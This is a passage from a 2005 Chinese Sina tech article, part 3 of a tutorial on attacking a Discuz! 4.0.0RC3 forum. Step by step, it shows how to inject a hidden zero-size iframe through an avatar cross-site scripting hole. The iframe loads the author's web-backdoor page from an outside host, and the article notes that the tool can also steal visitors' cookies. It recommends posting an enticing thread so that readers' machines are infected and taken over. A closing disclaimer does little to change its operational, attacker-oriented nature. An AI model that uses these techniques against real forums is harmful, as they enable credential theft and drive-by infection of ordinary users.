首页新闻体育娱乐视频财经科技汽车房产游戏女性天气短信邮箱导航通行证
爱问(iAsk.com)
科技时代新浪首页 > 科技时代 > 学园 > 正文

黑客入侵实例 记对Discuz论坛的入侵(3)


http://www.sina.com.cn 2005年09月16日 09:25 天极yesky

  文/小地瓜

    步骤2.在第三步跨站内容处输入所要插入的恶意代码,如果此时你对代码知识一无所知,可以参考左边代码助手,标签中的三个按钮(如图6)。这里笔者单击“插入IFrame”按钮,会在所需的跨站内容处,出现<iframe src='' width=0 height=0></iframe>的字符代码。然后在<iframe src的等于后面,填入www.fa***d.com\fda.asp的网址,这是笔者事先制作好的网页后门地址。

黑客入侵实例记对Discuz论坛的入侵(3)
图6代码助手

  小提示:代码助手中,“弹出对话框”按钮、“读取COOKIES”按钮以及插入“IFrame”按钮,分别代表当用户浏览过含有自己帖子的同时,1.会弹出如图3的警告对话框。2.得到浏览用户的COOKIES信息。3.在机器中加载网站木马的相关信息。

  步骤3.输入完毕后,其他设置保持默认,然后单击“提交”按钮。执行进度框内,会呈现出写入站点代码的整个过程(如图7)。但是成功与否还需要看见后面的成功提示,方可判断本次写入是否成功,这里笔者等待十秒钟后,弹出了成功的“结论”(如图8)。既然恶意地址写入成功,在漏洞论坛取个诱惑力,较强的标题名称发表,从而让浏览过此帖的用户,都能重上笔者所建立的网页木马。

黑客入侵实例记对Discuz论坛的入侵(3)
图7执行进度

黑客入侵实例记对Discuz论坛的入侵(3)
图8应用程序

  三、总结

  Discuz!4 dot 0.0RC3版本的头像跨站漏洞,虽然不会危机到整个论坛的安全性能,但是它会牵扯到论坛所用户的电脑安危。小则导致重要信息被窃取,大则电脑摇身变肉鸡!

  注意:本文所介绍的内容,只是告诉大家这种技术,任何人不得利用此技术做非法的事情。

[上一页] [1] [2] [3]

发表评论

爱问(iAsk.com)



评论】【论坛】【收藏此页】【 】【多种方式看新闻】【下载点点通】【打印】【关闭




科技时代意见反馈留言板 电话:010-82628888-5828   欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

Copyright © 1996 - 2005 SINA Inc. All Rights Reserved

版权所有 新浪网